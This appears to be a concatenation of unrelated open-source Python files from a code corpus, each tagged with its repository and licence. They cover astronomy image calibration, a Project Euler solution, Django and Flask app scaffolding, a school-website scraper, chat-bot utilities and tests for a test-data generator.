bias = ccdproc.trim_image(bias, trim_range);
#write master frame to file
hdulist = bias.to_hdu()
hdulist.writeto(bias_path, clobber=True)
#dark
#create master dark frame
im=glob.glob(dark_path+'*.fits')+glob.glob(dark_path+'*.fit')
if(len(im) <= 0):
logme('Error. Dark calibration frame(s) not found (%s).' % dark_path)
log.close()
sys.exit(-1)
darks = None
bias_header = None
for i in range(0,len(im)):
#is (any) dark bias corrected?
header = fits.getheader(im[i])
if(header.get('BIAS') != None):
dark_is_bias_corrected = True
dark_bias = header.get('BIAS')
elif(header.get('BIASCORR') != None):
dark_is_bias_corrected = True
dark_bias = header.get('BIASCORR')
if(darks):
darks += ','+im[i]
else:
darks = im[i]
#if there is just one, make it two of the same for the combine!
if (len(im) == 1):
darks += ','+im[0]
dark_path += 'master/'
try:
os.mkdir(dark_path)
except:
pass
dark_path += dark_master
logme('Creating master dark frame (%s)...'%(dark_path))
dark = ccdproc.combine(darks, method='median', unit='adu', add_keyword=False, **{'verify': 'ignore'})
#trim it, if necessary
if(len(trim_range) > 0):
dark = ccdproc.trim_image(dark, trim_range);
#bias correct, if necessary
if(not dark_is_bias_corrected):
#logme('Subtracting master bias frame from master dark frame...')
dark = ccdproc.subtract_bias(dark, bias, add_keyword=False)
dark_bias = bias_master
else:
logme('Master dark frame is *already* bias corrected (%s).'%dark_bias)
#write master dark frame
hdulist = dark.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['BIASCORR'] = dark_bias
hdulist.writeto(dark_path, clobber=True)
#flat
#create master flat frame
im=glob.glob(flat_path+'*.fits')+glob.glob(flat_path+'*.fit')
if(len(im) <= 0):
logme('Error. Flat calibration frame(s) not found (%s).' % flat_path)
log.close()
sys.exit(-1)
flats = None
count = 0
flat_corrected = None
#check a few things in these flat component frames
for i in range(0,len(im)):
header = fits.getheader(im[i])
#is this flat bias corrected?
if(header.get('BIAS') != None):
flat_is_bias_corrected = True
flat_bias = header.get('BIAS')
elif(header.get('BIASCORR') != None):
flat_is_bias_corrected = True
flat_bias = header.get('BIASCORR')
#is this flat dark corrected?
if(header.get('DARK') != None):
flat_is_dark_corrected = True
flat_dark = header.get('DARK')
elif(header.get('DARKCORR') != None):
flat_is_dark_corrected = True
flat_dark = header.get('DARKCORR')
flat_corrected = "%s"%(im[i].rsplit('.',1)[0])+".corrected"
shutil.copy(im[i], flat_corrected)
#trim as necessary
if(len(trim_range) > 0):
flat = ccdproc.CCDData.read(flat_corrected, unit='adu', relax=True)
flat = ccdproc.trim_image(flat, trim_range)
hdulist = flat.to_hdu()
hdulist.writeto(flat_corrected, clobber=True)
#bias correct, if necessary
if(not flat_is_bias_corrected):
#logme('Subtracting master bias frame from flat frame...')
flat = ccdproc.CCDData.read(flat_corrected, unit='adu', relax=True)
#trim it, if necessary
#if(len(trim_range) > 0):
# flat = ccdproc.trim_image(flat, trim_range);
#flat = ccdproc.subtract_bias(flat, bias, add_keyword=False)
hdulist = flat.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['BIASCORR'] = flat_bias
hdulist.writeto(flat_corrected, clobber=True)
flat_bias = bias_master
else:
logme('Flat frame (%s) is *already* bias corrected (%s).'%(im[i],flat_bias))
#dark correct, if necessary
if(not flat_is_dark_corrected):
#logme('Subtracting master dark frame from flat frame...')
flat = ccdproc.CCDData.read(flat_corrected, unit='adu', relax=True)
##trim it, if necessary
#if(len(trim_range) > 0):
# flat = ccdproc.trim_image(flat, trim_range);
flat = ccdproc.subtract_dark(flat, dark, scale=True, exposure_time=exposure_label, exposure_unit=u.second, add_keyword=False)
hdulist = flat.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['DARKCORR'] = dark_bias
hdulist.writeto(flat_corrected, clobber=True)
flat_dark = dark_master
else:
logme('Flat frame (%s) is *already* dark corrected (%s).'%(im[i],flat_dark) )
if(flats):
flats += ','+flat_corrected
else:
flats = flat_corrected
#calc average exposure time for potential dark correction
if(header.get('EXPTIME') != None):
#print header.get('EXPTIME')
try:
exptime = float(header.get('EXPTIME'))
flat_ave_exptime += exptime
except ValueError:
logme('Exposure time (EXPTIME) is not a float (%s).'%(header.get('EXPTIME')))
count += 1
#calc average exposure time
#if(count > 0):
# flat_ave_exptime = flat_ave_exptime/count
# flat.header['EXPTIME'] = flat_ave_exptime
# logme("Average exposure time for flats is %f"%flat_ave_exptime)
#if there is just one, make it two of the same!
if (len(im) == 1):
flats += ','+flat_corrected
flat_path += 'master/'
try:
os.mkdir(flat_path)
except:
pass
flat_path += flat_master
logme('Creating master flat frame (%s)...'%(flat_path))
#scale the flat component frames to have the same mean value, 10000.0
scaling_func = lambda arr: 10000.0/np.ma.median(arr)
#combine them
flat = ccdproc.combine(flats, method='median', scale=scaling_func, unit='adu', add_keyword=False)
##trim it, if necessary
#if(len(trim_range) > 0):
# #logme('Trimming flat image (%s)...'%(trim_range))
# flat = ccdproc.trim_image(flat, trim_range);
#write master flat frame
hdulist = flat.to_hdu()
#add bias correction to header
header=hdulist[0].header
header['BIASCORR'] = flat_bias
header['DARKCORR'] = flat_dark
if(count > 0):
flat_ave_exptime = flat_ave_exptime/count
header['EXPTIME'] = flat_ave_exptime
hdulist.writeto(flat_path, clobber=True)
#get a list of all FITS files in the input directory
fits_files=glob.glob(input_path+'*.fits')+glob.glob(input_path+'*.fit')
#loop through all qualifying files and perform plate-solving
logme('Calibrating images in %s' %input_path)
for fits_file in fits_files:
#open image
image = ccdproc.CCDData.read(fits_file, unit='adu', relax=True)
#trim it, if necessary
if(len(trim_range) > 0):
image = ccdproc.trim_image(image, trim_range);
#subtract bias from light, dark, and flat frames
image = ccdproc.subtract_bias(image, bias, add_keyword=False)
image = ccdproc.subtract_dark(image, dark, scale=True, exposure_time=exposure_label, exposure_unit=u.second, add_keyword=False)
image = ccdproc.flat_correct(image, flat, add_keyword=False)
#save calibrated image
output_file = "%s"%(fits_file.rsplit('.',1)[0])+output_suffix+".fits"
output_file = output_file.rsplit('/',1)[1]
output_file = output_path+output_file
#scale calibrated image back to int16, some FITS programs don't like float
hdulist = image.to_hdu()
hdulist[0].scale('int16', bzero=32768)
hdulist[0].header['BIASCORR'] = bias_master
hdulist[0].header['DARKCORR'] = dark_master
hdulist[0].header['FLATCORR'] = flat_master
if(len(trim_range) > 0):
hdulist[0].header['NAXIS1'] = '%d'%((naxis1_end-naxis1_start))
hdulist[0].header['NAXIS2'] = '%d'%((naxis2_end-naxis2_start))
hdulist.writeto(output_file, clobber=True)
logme('Calibrated %d images and saved to %s.' %(len(fits_files),output_path))
log.close() | mcnowinski/various-and-sundry | lightcurve/super.calibrate.py | Python | mit | 10,853 |
import time
def check_vertical(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)):
product = matrix[row][col] * matrix[row+1][col] * matrix[row+2][col] * matrix[row+3][col]
max_product = max(product, max_product)
return max_product
def check_horizontal(matrix):
max_product = 0
for row in xrange(0, len(matrix)):
for col in xrange(0, len(matrix)-3):
product = reduce(lambda x,y: x*y, matrix[row][col:col+3])
max_product = max(product, max_product)
return max_product
def check_left_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row][col] * matrix[row+1][col+1] * matrix[row+2][col+2] * matrix[row+3][col+3]
max_product = max(product, max_product)
return max_product
def check_right_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row+3][col] * matrix[row+2][col+1] * matrix[row+1][col+2] * matrix[row][col+3]
max_product = max(product, max_product)
return max_product
def main():
with open("011.txt", "r") as f:
# Read the matrix from the text file, and store in an integet 2-dimensional array
matrix = []
for line in f.readlines():
matrix.append([int(num) for num in line.split(" ")])
# print matrix
# Check the matrix along the various directions, and find the max product of four adjacent numbers
print("The result is %d." % max(check_vertical(matrix), check_horizontal(matrix), check_left_diagonal(matrix), check_right_diagonal(matrix)))
if __name__ == '__main__':
start = time.time()
main()
done = time.time()
print("The solution took %.4f seconds to compute." % (done - start)) | CianciuStyles/project-euler | 011.py | Python | mit | 1,763 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TrackedPosition',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('time', models.DateTimeField()),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
('altitude', models.FloatField()),
('accuracy', models.FloatField()),
],
options={
'ordering': ['id'],
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TrackingKey',
fields=[
('key', models.CharField(max_length=32, primary_key=True, serialize=False)),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TrackingSession',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('start_time', models.DateTimeField()),
('end_time', models.DateTimeField(null=True, blank=True)),
('active', models.BooleanField(default=True)),
('viewkey', models.CharField(max_length=32)),
('is_cleaned', models.BooleanField(default=False)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='trackedposition',
name='session',
field=models.ForeignKey(to='tracker.TrackingSession'),
preserve_default=True,
),
]
| nyrocron/tracking-server | tracker/migrations/0001_initial.py | Python | mit | 2,159 |
# -*- coding: utf-8 -*-
from django.conf.urls import url
from dictionaries.items.views import DicItemsListView, DicItemsCreateView, \
DicItemsDetailView, DicItemsUpdateView, DicItemsDeleteView
urlpatterns = [
url(r'^$', DicItemsListView.as_view(), name='items-list'),
url(r'^add/$', DicItemsCreateView.as_view(), name='items-add'),
url(r'^(?P<dictionary_id>[0-9]+)/$', DicItemsDetailView.as_view(), name='items-detail'),
url(r'^(?P<dictionary_id>[0-9]+)/edit/$', DicItemsUpdateView.as_view(), name='items-edit'),
url(r'^(?P<dictionary_id>[0-9]+)/delete/$', DicItemsDeleteView.as_view(), name='items-delete'),
]
| mitrofun/kids2 | src/apps/dictionaries/items/urls.py | Python | mit | 637 |
from flask.ext.sqlalchemy import SQLAlchemy
from . import db
class Role(db.Model):
__tablename__='roles'
id=db.Column(db.Integer,primary_key=True)
name=db.Column(db.String(64),unique=True)
users=db.relationship('User',backref='role')
def __repr__(self):
return '<Role>{}</Role>'.format(self.name)
class User(db.Model):
__tablename__='users'
id=db.Column(db.Integer,primary_key=True)
role_id=db.Column(db.Integer,db.ForeignKey('roles.id'))
username=db.Column(db.String(64),unique=True,index=True)
def __repr__(self):
return '<Username>{}</Username>'.format(self.username)
| zhangmingkai4315/Flask-Web-App | app/models.py | Python | mit | 628 |
SCHEDULE_NONE = None
SCHEDULE_HOURLY = '0 * * * *'
SCHEDULE_DAILY = '0 0 * * *'
SCHEDULE_WEEKLY = '0 0 * * 0'
SCHEDULE_MONTHLY = '0 0 1 * *'
SCHEDULE_YEARLY = '0 0 1 1 *'
| frictionlessdata/datapackage-pipelines | datapackage_pipelines/generators/schedules.py | Python | mit | 171 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
import urls
from apps.blog import views
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'gigsblog.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
# url(r'^admin/', include(admin.site.urls)),
url(r'^$', views.Index.as_view(), name='index'),
url(r'^signup', views.SignUp.as_view(), name='signUp'),
url(r'^login', views.Login.as_view(), name='login'),
url(r'^logout', 'django.contrib.auth.views.logout',{'next_page':'/'}, name='logout'),
url(r'^post/', include('urls.blog', namespace='post')),
url(r'^admin/', include('urls.admin')),
)
| gusaul/gigsblog | urls/main.py | Python | mit | 683 |
#!/usr/bin/python
# -*- coding: utf8 -*-
from bs4 import BeautifulSoup as Soup
import urls
import re
import proxy
from datetime import *
import time
from time import mktime
import functions
def materials ( config ):
url = "https://www.lectio.dk/lectio/%s/MaterialOverview.aspx?holdelement_id=%s" % ( str(config["school_id"]), str(config["team_element_id"]) )
cookies = {}
# Insert User-agent headers and the cookie information
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1665.2 Safari/537.36",
"Content-Type" : "application/x-www-form-urlencoded",
"Host" : "www.lectio.dk",
"Origin" : "https://www.lectio.dk",
"Cookie" : functions.implode(cookies, "{{index}}={{value}}", "; ")
}
response = proxy.session.get(url, headers=headers)
html = response.text
soup = Soup(html)
if soup.find("table", attrs={"id" : "m_Content_MaterialsStudents"}) is None:
return {
"status" : False,
"error" : "Data not found"
}
rows = soup.find("table", attrs={"id" : "m_Content_MaterialsStudents"}).findAll("tr")
materialsList = []
if len(rows) > 1:
rows.pop(0)
titleProg = re.compile(ur"(?P<authors>.*): (?P<title>.*), (?P<publisher>.*)")
for row in rows:
elements = row.findAll("td")
title = unicode(elements[0].text.replace("\n", ""))
titleGroups = titleProg.match(title)
materialsList.append({
"title_text" : title,
"title" : titleGroups.group("title") if not titleGroups is None else title,
"publisher" : titleGroups.group("publisher") if not titleGroups is None else "",
"authors" : titleGroups.group("authors").split(", ") if not titleGroups is None else "",
"type" : "book" if unicode(elements[1].text.replace("\n", "")) == u"Bog" else unicode(elements[1].text.replace("\n", "")),
"book_storage" : True if elements[2].text.replace("\n", "") == "Ja" else False,
"comment" : unicode(elements[3].text.strip("\n").replace("\n", "")),
"ebook" : elements[4].text.strip("\n").replace("\n", "")
})
return {
"status" : "ok",
"materials" : materialsList
} | boh1996/LectioAPI | scrapers/materials.py | Python | mit | 2,102 |
#!/usr/bin/env python
# Copyright (c) 2011-2015 SEOmoz, Moz
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='mozscape',
version='0.1.1',
description='Mozscape API Bindings for Python',
author_email='[email protected]',
url='http://github.com/seomoz/SEOmozAPISamples',
py_modules=['mozscape'],
license='MIT',
platforms='Posix; MacOS X',
classifiers=[
'License :: OSI Approved :: MIT License',
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Topic :: Internet :: WWW/HTTP'],
)
| seomoz/SEOmozAPISamples | python/setup.py | Python | mit | 1,723 |
import json
import datetime
import threading
from base_plugin import *
import base_plugin
#=============================================Messaging===================================
def send_message(recipient, message, mtype='chat'):
'''
Send a message to recipient.
:param recipient: The To field of your message.
:param message: the message string to send.
:para mtype: The message type to send, supports public/private and xmpp style chat/groupchat.
'''
if mtype == 'private':
mtype = 'chat'
if mtype == 'public':
mtype = 'groupchat'
base_plugin.PluginContext.client.send_message(mto=recipient, mbody=message, mtype=mtype)
#=============================================FILTERS=====================================
#FIXME: this seems broken.
def self_message(event, plugin):
'''
filter for self generated events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if not self generated event, false otherwise.
'''
if msg.From_Nick != plugin.client.nick and plugin.client.nick in msg.Body:
return True
return False
def on_message(event, plugin):
'''
filter for group chat events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if a group chat event, false otherwise.
'''
if event.Type in ["groupchat"]:
return True
return False
def on_private_message(event, plugin):
'''
filter for private message events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if a private message event, false otherwise.
'''
if not event.Room:
return True
return False
def on_presence(event, plugin):
'''
filter for join/part type events.
:param event: the event being filtered
:param plugin: the plugin hosting the filter
returns - true if a presence event, false otherwise.
'''
if event.Type in ["available", "unavailable"]:
return True
return False
#=============================================FILE OPERATORS=====================================
def put_object_to_file(item, path):
'''
Syntactic sugar, write jsonified object to file.
:param item: Any json-able item.
:param path: path to log file.
'''
with open(path, 'w+') as f:
f.write(json.dumps(item))
def get_object_from_file(path):
'''
Syntactic sugar, read jsonified object from file.
:param path: path to log file where item is stored.
Returns - json expanded item from log file.
'''
with open(path, 'r') as f:
item_str = f.read()
return json.loads(item_str)
def append_to_file(string, path):
'''
Syntactic sugar, append string to file.
:param item: Any json-able item.
:param path: path to log file.
'''
with open(path, 'a') as f:
f.write(string)
def write_to_file(string, path):
'''
Syntactic sugar, write string to file.
:param item: Any json-able item.
:param path: path to log file.
'''
with open(path, 'w+') as f:
f.write(string)
def read_from_file(path):
'''
Syntactic sugar, read from file.
:param path: path to log file where item is stored.
Returns - string contents of log file.
'''
with open(path, 'r') as f:
return f.read()
def read_lines_from_file(path):
'''
Read lines from file, as seperated by newline/enter.
:param path: path to log file
Returns - list of lines
'''
return read_from_file(path).split('\n')
#===========================================TIMED EVENTS=====================================
def schedule_event_by_delay(delay, event, args=[]):
'''
Schedule an event by a delay in seconds.
:param delay: number of seconds until event triggers.
:param event: the action to be triggered.
:param args: the arguments to pass when the event is called. (default [])
'''
threading.Timer(delay, call_function_with_variable_arguments, [event, args]).start()
def schedule_event(time, event, args=[]):
'''
Schedule an event by an absolute time
:param time: the datetime object representing the trigger time.
:param event: the action to be triggered.
:param args: the arguments to pass when the event is called. (default [])
'''
delta = time - datetime.datetime.now()
threading.Timer(delta.total_seconds(), call_function_with_variable_arguments, [event, args]).start()
def schedule_event(year, month, day, hour, minute, second, event, args=[]):
'''
Schedule an event by an absolute time
:param year: year of the event
:param month: month of the event
:param day: day of the event
:param hour: hour of the event
:param minute: minute of the event
:param second: second of the event
:param event: the action to be triggered.
:param args: the arguments to pass when the event is called. (default [])
'''
time = datetime.datetime(year, month, day, hour, minute, second)
delta = time - datetime.datetime.now()
threading.Timer(delta.total_seconds(), call_function_with_variable_arguments, [event, args]).start()
#==========================================HERE THERE BE DRAGONS=================================================
def call_function_with_variable_arguments(function, arguments):
'''
Takes functions, takes arguments, makes it fit.
:param function: The function to call
:param arguments: The argument list to make fit.
'''
iterator = len(arguments)
while True:
real_exception = None
try:
function(*(arguments[:iterator]))
return
except Exception as e:
if not real_exception or "takes exactly" not in str(e) or "arguments" not in str(e):
real_exception = e
iterator -= 1
if iterator < 0:
raise real_exception
| Gehn/JustAChatBot | plugin_utils.py | Python | mit | 5,651 |
def cheese_and_crackers(cheese_count,boxes_of_crackers):
print "You have %d cheeses!" % cheese_count
print "You have %d boxes of crackers!" % boxes_of_crackers
print "Man that's enough for a party!"
print "Get a blanket.\n"
print "We can just give the function numbers directly:"
cheese_and_crackers(20,30)
print "OR, we can use variables from our script:"
amount_of_cheese = 10
amount_of_crackers = 50
cheese_and_crackers(amount_of_cheese,amount_of_crackers)
print "We can even do math inside too."
cheese_and_crackers(10+20,5+6)
print "And we can combine the two,variables and math:"
cheese_and_crackers(amount_of_cheese+100,amount_of_crackers+1000)
| BeeBubble/SnakeRace | LPTHW/ex019.py | Python | mit | 673 |
from babymaker import BabyMaker, EnumType, IntType, StringType, UUIDType, FieldType, DatetimeType, FloatType, EmbedType
import unittest
import string
import sys
from datetime import datetime, timedelta
class TestMakeSomeBabies(unittest.TestCase):
def test_make_one(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
self.assertTrue("id" in one)
def test_make_some(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(8))
self.assertEquals(len(some), 8)
for one in some:
self.assertTrue("id" in one)
def test_uuid_field_hex_format(self):
fields = {
"id": UUIDType(format="hex_str")
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertEquals(len(the_id), 32)
for char in the_id:
self.assertTrue(char in string.hexdigits)
def test_uuid_field_default_format(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertEquals(len(the_id), 36)
for char in the_id:
self.assertTrue(char in string.hexdigits + "-")
def test_uuid_field_int_format(self):
fields = {
"id": UUIDType("int")
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, int)
def test_uuid_field_int_str_format(self):
fields = {
"id": UUIDType("int_str")
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
for char in the_id:
self.assertTrue(char in string.digits)
will_it_blend = int(the_id)
def test_int_field(self):
fields = {
"id": IntType(min_value=10, max_value=11)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, int)
self.assertTrue(the_id >= 10)
self.assertTrue(the_id <= 11)
fields = {
"id": IntType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, int)
self.assertTrue(the_id >= 0)
self.assertTrue(the_id <= sys.maxsize)
def test_float_field(self):
fields = {
"id": FloatType(min_value=2.0, max_value=10.0)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 2.0)
self.assertTrue(the_id <= 10.0)
fields = {
"id": FloatType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 0.0)
self.assertTrue(the_id <= 1.0)
for baby in female_of_the_species.make_some(100):
the_id = baby.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 0.0)
self.assertTrue(the_id <= 1.0)
fields = {
"id": FloatType(min_value=1.0)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, float)
self.assertTrue(the_id >= 1.0)
self.assertTrue(the_id <= 2.0)
def test_string_field(self):
fields = {
"id": StringType(min_size=10, max_size=22)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, str)
for char in the_id:
self.assertTrue(char in string.printable)
self.assertTrue(len(the_id) >= 10)
self.assertTrue(len(the_id) <= 22)
fields = {
"id": StringType()
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, str)
for char in the_id:
self.assertTrue(char in string.printable)
self.assertTrue(len(the_id) >= 0)
self.assertTrue(len(the_id) <= 64)
def test_string_field_with_limited_chars(self):
allowed_chars = "paul"
fields = {
"id": StringType(allowed_chars=allowed_chars, min_size=10, max_size=22)
}
female_of_the_species = BabyMaker(fields)
one = female_of_the_species.make_one()
the_id = one.get("id")
self.assertIsInstance(the_id, str)
for char in the_id:
self.assertTrue(char in allowed_chars)
self.assertTrue(len(the_id) >= 10)
self.assertTrue(len(the_id) <= 22)
def test_enum_type(self):
choices = [1, 8, "paul", 12, None]
fields = {
"id": EnumType(choices=choices)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
the_id = one.get("id")
self.assertTrue(the_id in choices)
def test_base_field_type(self):
fields = {
"id": FieldType()
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
the_id = one.get("id")
self.assertIsNone(the_id)
def test_datetime_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
fields = {
"created": DatetimeType(start, end)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
def test_datetime_notime_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
fields = {
"created": DatetimeType(start, end, include_time=False)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(88))
self.assertEquals(len(some), 88)
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertEquals(created.hour, 0)
self.assertEquals(created.minute, 0)
self.assertEquals(created.second, 0)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
def test_datetime_incremental_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
delta = timedelta(weeks=1)
fields = {
"created": DatetimeType(start, end, increment=delta)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(56))
self.assertEquals(len(some), 56)
test_value = start
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
self.assertEquals(created, test_value)
test_value += delta
if test_value >= end:
test_value = start
def test_datetime_decremental_type(self):
start = datetime(1976, 7, 15)
end = datetime(1977, 7, 15)
delta = timedelta(weeks=-1)
fields = {
"created": DatetimeType(start, end, increment=delta)
}
female_of_the_species = BabyMaker(fields)
some = list(female_of_the_species.make_some(56))
self.assertEquals(len(some), 56)
test_value = end
for one in some:
created = one.get("created")
self.assertIsInstance(created, datetime)
self.assertTrue(created <= end)
self.assertTrue(created >= start)
self.assertEquals(created, test_value)
test_value += delta
if test_value <= start:
test_value = end
def test_embedded_maker(self):
fields = {
"id": UUIDType()
}
female_of_the_species = BabyMaker(fields)
fields2 = {
"inbed": EmbedType(female_of_the_species),
"id": UUIDType()
}
grandma = BabyMaker(fields2)
one = grandma.make_one()
self.assertTrue("id" in one)
self.assertTrue("inbed" in one)
self.assertTrue("id" in one.inbed)
| bvalerius/py-babymaker | tests/test_babymaker.py | Python | mit | 9,457 |
Subsets and Splits